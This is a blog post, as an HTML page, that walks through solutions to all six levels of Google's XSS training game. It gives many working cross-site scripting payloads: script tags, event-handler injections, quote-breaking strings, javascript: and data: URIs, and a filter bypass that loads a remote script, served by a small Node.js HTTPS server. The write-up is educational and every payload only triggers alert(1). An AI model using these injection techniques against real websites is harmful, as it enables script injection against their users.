<!DOCTYPE html>
<html lang="en-us">
    
    


    <head>
    <link href="https://gmpg.org/xfn/11" rel="profile">
    <meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Cache-Control" content="public" />
<!-- Enable responsiveness on mobile devices -->
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">
<meta name="generator" content="Hugo 0.62.0" />

    
    
    

<title>Diving into XSS googles game • </title>


<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Diving into XSS googles game"/>
<meta name="twitter:description" content="Hi there, this post deals with the game released by Google few days ago about XSS vulnerabilities that you can find here.
I&#39;ll enumerate some of the solution I found on the Internet which were (in my opnion) interesting/fun. This post contains the solutions for all levels. Big spoil.
Level 1: Hello, world of XSS Well, this one was obvious:
&lt;script&gt;alert(1);&lt;/script&gt; Level 2: Persistence is key For this one, you had different options:"/>

<meta property="og:title" content="Diving into XSS googles game" />
<meta property="og:description" content="Hi there, this post deals with the game released by Google few days ago about XSS vulnerabilities that you can find here.
I&#39;ll enumerate some of the solution I found on the Internet which were (in my opnion) interesting/fun. This post contains the solutions for all levels. Big spoil.
Level 1: Hello, world of XSS Well, this one was obvious:
&lt;script&gt;alert(1);&lt;/script&gt; Level 2: Persistence is key For this one, you had different options:" />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://paulsec.github.io/posts/diving-into-xss-googles-game/" />
<meta property="article:published_time" content="2014-06-02T00:00:00+00:00" />
<meta property="article:modified_time" content="2014-06-02T00:00:00+00:00" /><meta property="og:site_name" content="PaulSec&#39;s Blog" />


    


<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/styles/github.min.css">








<link rel="stylesheet" href="/scss/hyde-hyde.92c66d107d7b219f0792cfd67223179af884b03f386ac46894f9f735932bbca3.css" integrity="sha256-ksZtEH17IZ8Hks/WciMXmviEsD84asRolPn3NZMrvKM=">


<link rel="stylesheet" href="/scss/print.2744dcbf8a0b2e74f8a50e4b34e5f441be7cf93cc7de27029121c6a09f9e77bc.css" integrity="sha256-J0Tcv4oLLnT4pQ5LNOX0Qb58&#43;TzH3icCkSHGoJ&#43;ed7w=" media="print">



    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
    <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>
    <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
    <!-- Icons -->
    <link rel="apple-touch-icon-precomposed" sizes="144x144" href="/apple-touch-icon-144-precomposed.png">
    <link rel="shortcut icon" href="/favicon.png">
    
    

</head>


    <body class=" ">
    
<div class="sidebar">
  <div class="container ">
    <div class="sidebar-about">
      <span class="site__title">
        <a href="http://paulsec.github.io/"></a>
      </span>
      
        
        
        
        <div class="author-image">
          <img src="http://paulsec.github.io/img/profile.png" alt="Author Image" class="img--circle img--headshot element--center">
        </div>
        
      
      
      <p class="site__description">
         PaulSec&#39;s Blog. Security &amp; lulz. 
      </p>
    </div>
    <div class="collapsible-menu">
      <input type="checkbox" id="menuToggle">
      <label for="menuToggle"></label>
      <div class="menu-content">
        <div>
	<ul class="sidebar-nav">
		 
		 
			 
				<li>
					<a href="/">
						<span>Home</span>
					</a>
				</li>
			 
		 
			 
				<li>
					<a href="/posts/">
						<span>Posts</span>
					</a>
				</li>
			 
		 
			 
				<li>
					<a href="/about/">
						<span>About</span>
					</a>
				</li>
			 
		
	</ul>
</div>

        <section class="social">
	
	<a href="https://twitter.com/@PaulWebSec" rel="me"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a>
	
	
	
	<a href="https://github.com/PaulSec" rel="me"><i class="fab fa-github fa-lg" aria-hidden="true"></i></a>
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
</section>

      </div>
    </div>
    
<div class="copyright">
  &copy; 2021 Paul A.
  
    <a href="https://creativecommons.org/licenses/by-sa/4.0">CC BY-SA 4.0</a>
  
</div>


<div class="builtwith">
Built with <a href="https://gohugo.io">Hugo</a> ❤️ <a href="https://github.com/htr3n/hyde-hyde">hyde-hyde</a>.
</div>


  </div>
</div>

        <div class="content container">
            
    
<article>
  <header>
    <h1>Diving into XSS googles game</h1>
    
    
<div class="post__meta">
    
    
      <i class="fas fa-calendar-alt"></i> Jun 2, 2014
    
    
    
      
      
          in
          
          
              <a class="badge badge-category" href="/categories/vuln">VULN</a>
              •
          
              <a class="badge badge-category" href="/categories/web">WEB</a>
              •
          
              <a class="badge badge-category" href="/categories/xss">XSS</a>
              
          
      
    
    
    
    <br/>
    <i class="fas fa-clock"></i> 3 min read
</div>


  </header>
  
  
  <div class="post">
    <p>Hi there, this post deals with the game released by Google few days ago about XSS vulnerabilities that you can find <a href="https://xss-game.appspot.com/">here</a>.</p>
<p>I'll enumerate some of the solution I found on the Internet which were (in my opnion) interesting/fun.
This post contains the solutions for all levels. <strong>Big spoil.</strong></p>
<h2 id="level-1-hello-world-of-xss">Level 1: Hello, world of XSS</h2>
<p>Well, this one was obvious:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-javascript" data-lang="javascript"><span style="color:#f92672">&lt;</span><span style="color:#a6e22e">script</span><span style="color:#f92672">&gt;</span><span style="color:#a6e22e">alert</span>(<span style="color:#ae81ff">1</span>);<span style="color:#f92672">&lt;</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#960050;background-color:#1e0010">s</span><span style="color:#960050;background-color:#1e0010">c</span><span style="color:#960050;background-color:#1e0010">r</span><span style="color:#960050;background-color:#1e0010">i</span><span style="color:#960050;background-color:#1e0010">p</span><span style="color:#960050;background-color:#1e0010">t</span><span style="color:#960050;background-color:#1e0010">&gt;</span>
</code></pre></div><h2 id="level-2-persistence-is-key">Level 2: Persistence is key</h2>
<p>For this one, you had different options:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">&lt;<span style="color:#f92672">a</span> <span style="color:#a6e22e">href</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;test&#34;</span> <span style="color:#a6e22e">onclick</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;javascript:alert(1);&#34;</span>&gt;test&lt;/<span style="color:#f92672">a</span>&gt;
</code></pre></div><p><em>Creating a link (will need an interaction with the user)</em></p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">&lt;<span style="color:#f92672">img</span> <span style="color:#a6e22e">src</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;test.png&#34;</span> <span style="color:#a6e22e">onerror</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;javascript:alert(1);&#34;</span> /&gt;
</code></pre></div><p><em>Loading an invalid image (using onerror) - no interaction</em></p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">&lt;<span style="color:#f92672">img</span> <span style="color:#a6e22e">src</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;https://xss-game.appspot.com/static/level2_icon.png&#34;</span> <span style="color:#a6e22e">onload</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;alert(1);&#34;</span> /&gt;
</code></pre></div><p><em>Loading a valid image (using onload) - no interaction</em></p>
<h2 id="level-3-that-sinking-feeling">Level 3: That sinking feeling&hellip;</h2>
<p>The image loaded on the page uses the <code>window.location.hash</code> javascript property.</p>
<p>We can abuse it this way:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-javascript" data-lang="javascript"><span style="color:#ae81ff">1.</span><span style="color:#a6e22e">jpg</span><span style="color:#e6db74">&#39; onload=&#39;</span><span style="color:#a6e22e">javascript</span><span style="color:#f92672">:</span><span style="color:#a6e22e">alert</span>(<span style="color:#ae81ff">1</span>);<span style="color:#960050;background-color:#1e0010">&#39;</span>
</code></pre></div><p><em>Loading a valid image (using onload) - no interaction</em></p>
<p>And also:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-javascript" data-lang="javascript"><span style="color:#960050;background-color:#1e0010">&#39;</span> <span style="color:#a6e22e">onerror</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;alert(1)&#34;</span><span style="color:#f92672">&gt;</span>
</code></pre></div><p><em>Loading an invalid image (using onerror) - no interaction</em></p>
<p>It was also possible to use the <code>script</code> tag like this:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-javascript" data-lang="javascript"><span style="color:#960050;background-color:#1e0010">&#39;</span><span style="color:#f92672">&gt;</span><span style="color:#f92672">&lt;</span><span style="color:#a6e22e">script</span><span style="color:#f92672">&gt;</span><span style="color:#a6e22e">alert</span>(<span style="color:#ae81ff">1</span>);<span style="color:#f92672">&lt;</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#960050;background-color:#1e0010">s</span><span style="color:#960050;background-color:#1e0010">c</span><span style="color:#960050;background-color:#1e0010">r</span><span style="color:#960050;background-color:#1e0010">i</span><span style="color:#960050;background-color:#1e0010">p</span><span style="color:#960050;background-color:#1e0010">t</span><span style="color:#960050;background-color:#1e0010">&gt;</span>
</code></pre></div><h2 id="level-4-context-matters">Level 4: Context matters</h2>
<p>To do this one there were different approaches:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-javascript" data-lang="javascript"><span style="color:#ae81ff">1</span><span style="color:#e6db74">&#39;)%3Balert(&#39;</span><span style="color:#ae81ff">1</span>
</code></pre></div><p>The semicolon character had to be encoded because otherwise it was escaped.</p>
<p>It was possible to escape <code>'</code> (single-quote character) too.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-javascript" data-lang="javascript"><span style="color:#ae81ff">1</span><span style="color:#f92672">%</span><span style="color:#ae81ff">27</span>)<span style="color:#f92672">%</span><span style="color:#ae81ff">3</span><span style="color:#a6e22e">balert</span>(<span style="color:#f92672">%</span><span style="color:#ae81ff">271</span>
</code></pre></div><p>It was also possible to use <code>||</code> logical operator.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-javascript" data-lang="javascript"><span style="color:#ae81ff">1</span><span style="color:#e6db74">&#39;) || alert(&#39;</span><span style="color:#ae81ff">1</span>
</code></pre></div><p>It was also possible to do it without any encoding/operator this way:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-javascript" data-lang="javascript"><span style="color:#ae81ff">1</span><span style="color:#960050;background-color:#1e0010">&#39;</span>);<span style="color:#a6e22e">alert</span>(<span style="color:#ae81ff">1</span>);<span style="color:#75715e">//
</span></code></pre></div><h2 id="level-5-breaking-protocol">Level 5: Breaking protocol</h2>
<p>For this one, characters such as <code>&quot;</code> (double-quote) was escaped.</p>
<p>We could just use:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-javascript" data-lang="javascript"><span style="color:#a6e22e">javascript</span><span style="color:#f92672">:</span><span style="color:#a6e22e">alert</span>(<span style="color:#ae81ff">1</span>);
</code></pre></div><p>Then, after clicking on the link, we popped up the alert box.</p>
<h2 id="level-6-follow-the-rabbit">Level 6: Follow the rabbit</h2>
<p>For the last level, it was possible to use <code>data:text/javascript</code> this way:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-javascript" data-lang="javascript"><span style="color:#a6e22e">data</span><span style="color:#f92672">:</span><span style="color:#a6e22e">text</span><span style="color:#f92672">/</span><span style="color:#a6e22e">javascript</span>,<span style="color:#a6e22e">alert</span>(<span style="color:#ae81ff">1</span>);
</code></pre></div><p>The regex was also case sensitive, so.. instead of &ldquo;http&rdquo;, we could write it &ldquo;HTTP&rdquo;.
Then, we were able to load remote scripts this way:</p>
<pre><code>HTTP://127.0.0.1:8000
</code></pre><p>or adding a whitespace at the beginning:</p>
<pre><code>http://127.0.0.1:8000
</code></pre><p>the index page only had to contain some javascript like: <code>alert(1);</code>.</p>
<p>I saw on the internet that some people didn't manage to load some HTTP scripts because they were using the HTTPS version.
In this case, you can create a simple HTTPS Server (using Node.js for example).</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-javascript" data-lang="javascript"><span style="color:#66d9ef">var</span> <span style="color:#a6e22e">https</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">require</span>(<span style="color:#e6db74">&#39;https&#39;</span>);
<span style="color:#66d9ef">var</span> <span style="color:#a6e22e">fs</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">require</span>(<span style="color:#e6db74">&#39;fs&#39;</span>);

<span style="color:#66d9ef">var</span> <span style="color:#a6e22e">hskey</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">fs</span>.<span style="color:#a6e22e">readFileSync</span>(<span style="color:#e6db74">&#39;server.key&#39;</span>);
<span style="color:#66d9ef">var</span> <span style="color:#a6e22e">hscert</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">fs</span>.<span style="color:#a6e22e">readFileSync</span>(<span style="color:#e6db74">&#39;server.crt&#39;</span>)

<span style="color:#66d9ef">var</span> <span style="color:#a6e22e">options</span> <span style="color:#f92672">=</span> {
    <span style="color:#a6e22e">key</span><span style="color:#f92672">:</span> <span style="color:#a6e22e">hskey</span>,
    <span style="color:#a6e22e">cert</span><span style="color:#f92672">:</span> <span style="color:#a6e22e">hscert</span>
};

<span style="color:#a6e22e">https</span>.<span style="color:#a6e22e">createServer</span>(<span style="color:#a6e22e">options</span>, <span style="color:#66d9ef">function</span> (<span style="color:#a6e22e">req</span>, <span style="color:#a6e22e">res</span>) {
    <span style="color:#a6e22e">res</span>.<span style="color:#a6e22e">writeHead</span>(<span style="color:#ae81ff">200</span>);
    <span style="color:#a6e22e">res</span>.<span style="color:#a6e22e">end</span>(<span style="color:#e6db74">&#34;alert(1);&#34;</span>);
}).<span style="color:#a6e22e">listen</span>(<span style="color:#ae81ff">8000</span>);
</code></pre></div><p><em>Simple HTTPS Server using Node.js</em></p>
<p>In both cases, you could bypass the filter using:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-javascript" data-lang="javascript"><span style="color:#75715e">//website.com/evilscript.js
</span></code></pre></div><p><strong>//</strong> is another way to say <code>https</code> or <code>http</code> depending on the protocol you were using.</p>
<p>For example, if we have our HTTPS Server running, we can inject this:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-javascript" data-lang="javascript"><span style="color:#75715e">//127.0.0.1:8000
</span></code></pre></div><p>Done.</p>
<p>Hope you learnt at least one trick.
This game was really fun. Waiting for the next one.</p>

  </div>
  

<div class="navigation navigation-single">
    
    <a href="/posts/bobby-write-up/" class="navigation-prev">
      <i aria-hidden="true" class="fa fa-chevron-left"></i>
      <span class="navigation-tittle">Bobby Write-up</span>
    </a>
    
    
    <a href="/posts/kioptrix-3-write-up/" class="navigation-next">
      <span class="navigation-tittle">Kioptrix 3 Write-up</span>
      <i aria-hidden="true" class="fa fa-chevron-right"></i>
    </a>
    
</div>


  

  
    


</article>


        </div>
        
    

<script defer src="https://use.fontawesome.com/releases/v5.11.2/js/all.js" integrity="sha384-b3ua1l97aVGAPEIe48b4TC60WUQbQaGi2jqAWM90y0OZXZeyaTCWtBTKtjW2GXG1" crossorigin="anonymous"></script>


    
    
        <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.13.1/highlight.min.js"></script>
        
    
    <script type="text/javascript">
        
        hljs.initHighlightingOnLoad();
    </script>
    




    



    </body>
</html>
